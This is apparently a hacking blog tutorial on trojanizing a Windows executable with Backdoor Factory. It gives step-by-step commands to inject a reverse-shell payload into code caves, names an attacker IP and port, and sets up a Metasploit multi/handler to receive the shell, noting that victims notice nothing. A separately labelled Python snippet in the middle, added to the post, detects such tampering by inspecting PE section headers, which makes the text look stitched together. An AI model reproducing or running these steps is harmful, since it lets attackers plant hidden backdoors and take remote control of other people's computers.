Backdoor Factory – How to inject shellcode into a Windows application

Backdoor Factory (BDF) is an application pre-installed in Kali Linux that injects shellcode into Windows applications. BDF can inject custom shellcode into an existing binary by placing the malicious code in between the genuine code. It first scans the binary and checks which payloads are compatible, then searches the whole file and lists the available "caves" where the injected code can reside without affecting the working of the application. Code caves are produced by compilers: a compiler has to pad certain areas of the binary, and it does so with long runs of 0x00 bytes, which are the code caves. Backdoor Factory overwrites one of those caves with the shellcode. We can choose any of the listed caves and build the executable.

The infected application works as intended, but the shellcode executes in the background, so a normal user notices nothing suspicious. This can target any Windows system regardless of version. Attackers use this tool as an alternative to the msfvenom payload generator. The workflow is the same as with an msfvenom payload: you set up a reverse handler in msfconsole and wait for the victim to connect back. Personally, I prefer this method over the older Windows hacking technique.

However, this won't work on protected applications, though most Windows applications are vulnerable to it. First you need to pick a lightweight portable executable. Here I'm injecting code into "Angry IP Scanner". Follow the steps below.

Video Demo

Step 1

Choose an application and use Backdoor Factory to list the available payloads:

# backdoor-factory -f "application.exe" -s show

It will show up like this:

root@anonymous:~/Desktop# backdoor-factory -f ip-scanner.exe -s show
Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmailcom
Twitter: @midnite_runr
IRC: freenode.net #BDFactory
Version: 3.0.5
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
The following WinIntelPE32s are available: (use -s)
cave_miner_inline
iat_reverse_tcp_inline
iat_reverse_tcp_inline_threaded
iat_reverse_tcp_stager_threaded
iat_user_supplied_shellcode_threaded
meterpreter_reverse_https_threaded
reverse_shell_tcp_inline
reverse_tcp_stager_threaded
user_supplied_shellcode_threaded
root@anonymous:~/Desktop#


Step 2

Now choose one of the shellcodes and inject it into the executable, giving the attacker IP and port for the reverse connection:

# backdoor-factory -f "application.exe" -s reverse_shell_tcp_inline -H "attacker_IP" -P 444

root@anonymous:~/Desktop# backdoor-factory -f ip-scanner.exe -s reverse_shell_tcp_inline -H 192.168.1.101 -P 444
Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmailcom
Twitter: @midnite_runr
IRC: freenode.net #BDFactory
Version: 3.0.5
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 366
[*] All caves lengths: 366
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don’t like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 366
[*] Available caves:
1. Section Name: None;Section Begin: None End: None; Cave begin:0x26c End: 0x3fc; Cave Size:400
2. Section Name: .text;Section Begin: 0x400 End: 0x4e00; Cave begin:0x4c30 End: 0x4dfc; Cave Size: 460
3. Section Name: .rdata;Section Begin: 0x5000 End: 0x5600; Cave begin:0x545e End: 0x55fc; Cave Size:414
4. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe398 End: 0xe580; Cave Size:488
5. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe598 End: 0xe784; Cave Size:492
6. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe79c End: 0xe984; Cave Size:488
7. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe9a0 End: 0xeb84; Cave Size:484
8. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xeba4 End: 0xed84; Cave Size:480
9. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xeda8 End: 0xef88; Cave Size:480
10. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xefac End: 0xf188; Cave Size:476
11. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf1ac End: 0xf388; Cave Size:476
12. Section Name:.rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf3b0 End: 0xf588; Cave Size:472
13. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf5b4 End: 0xf78c; Cave Size:472
14. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf7b8 End: 0xf98c; Cave Size:468
15. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf9bc End: 0xfb8c; Cave Size:464
16. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xfbc0 End: 0xfd90; Cave Size:464
17. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xfdc0 End: 0xff90; Cave Size:464
18. Section Name:.rsrc;Section Begin: 0x6200 End: 0x23000;Cave begin:0xffc4 End: 0x10190;Cave Size:460
19. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x101c8 End: 0x10390;Cave Size:456
20. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x10410 End: 0x10594;Cave Size:388
22. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x1e0a0 End: 0x1e2ec;Cave Size:588
23. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x22e21 End: 0x22ffc;Cave Size:475
**************************************************
[!] Enter your selection:


All the available caves are listed and the tool prompts for input. Choose any cave:


[!] Enter your selection: 11
[!] Using selection: 11
[*] Changing flags for section: .rsrc
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
File ip-scanner.exe is in the ‘backdoored’ directory
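The log above shows the two changes BDF leaves in the file: the section holding the chosen cave (.rsrc here) is marked executable, and the entry instructions are patched. As an added example that is not from the post or from BDF, the following Python check parses the PE section headers with only the standard library and reports exactly those artefacts; the sample PE headers are constructed, and their section addresses are assumptions loosely modelled on the output above.

```python
import struct
# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
DATA_SECTIONS = {b".rsrc", b".rdata", b".data", b".reloc"}

def parse_pe(data):
    """Return (entry_rva, [(name, rva, size, characteristics), ...]) from raw PE32 bytes."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections, off = [], opt + opt_size
    for _ in range(nsec):
        hdr = struct.unpack_from("<8sIIIIIIHHI", data, off)  # 40-byte section header
        sections.append((hdr[0].rstrip(b"\0"), hdr[2], hdr[1], hdr[9]))
        off += 40
    return entry_rva, sections

def audit(data):
    """List the inconsistencies a cave-injected binary tends to show."""
    entry_rva, sections = parse_pe(data)
    findings = []
    for name, rva, size, chars in sections:
        if name in DATA_SECTIONS and chars & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"{name.decode()} is marked executable")
        if rva <= entry_rva < rva + size and not chars & IMAGE_SCN_CNT_CODE:
            findings.append(f"entry point 0x{entry_rva:x} lies in non-code section {name.decode()}")
    return findings

def build_pe(entry_rva, sections):
    """Constructed minimal PE32 header (no real code), used only to exercise audit()."""
    dos = bytearray(64); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 64)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224); struct.pack_into("<H", opt, 0, 0x10B); struct.pack_into("<I", opt, 16, entry_rva)
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n.ljust(8, b"\0"), sz, rva, sz, 0, 0, 0, 0, 0, ch)
                    for n, rva, sz, ch in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs

# Constructed layouts: a clean file, and one with .rsrc made executable and the entry moved into it.
CLEAN = build_pe(0x1000, [(b".text", 0x1000, 0x4a00, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE),
                          (b".rsrc", 0x7000, 0x1ce00, 0x40000040)])
TAMPERED = build_pe(0xe1ac, [(b".text", 0x1000, 0x4a00, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE),
                             (b".rsrc", 0x7000, 0x1ce00, 0x40000040 | IMAGE_SCN_MEM_EXECUTE)])
```

Run `audit(open("file.exe", "rb").read())` against a real binary; an executable .rsrc or an entry point outside a code section is worth a closer look, although packers and some linkers can also produce such layouts.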


Step 3

The backdoored file is written to the "backdoored" folder. Now set up the msfconsole payload handler, choosing the same payload, port and IP you gave to BDF.

# msfconsole

Wait a minute for msfconsole to come up. Then select the handler and set the payload, port and host:

1. Handler

msf> use multi/handler

2. Set payload

msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST "attacker ip"

5. Exploit

msf exploit(handler) > exploit

Wait for the target to connect back:

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.101:444
[*] Starting the payload handler…

Step 4

Execute the binary on the target machine and a shell will be returned to the handler.

As I mentioned before, the executable works fine while the code executes in the background. Watch the video for a better idea. Any doubts or questions? Post them in the comment section below. If you like this blog, give me a like on Facebook and add me on Google Plus. Subscribe to my YouTube channel for video tutorials.

susmith HCK


I'm a computer enthusiast basically, and I love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16, and I would like to explore security vulnerabilities and the latest tech news and share them with you. If you like all this stuff, add me on Facebook and Google Plus.


1 Response

  1. Gema says:

    This command turns the Backdoor Factory into a hunt-and-shellcode-inject type of mechanism.
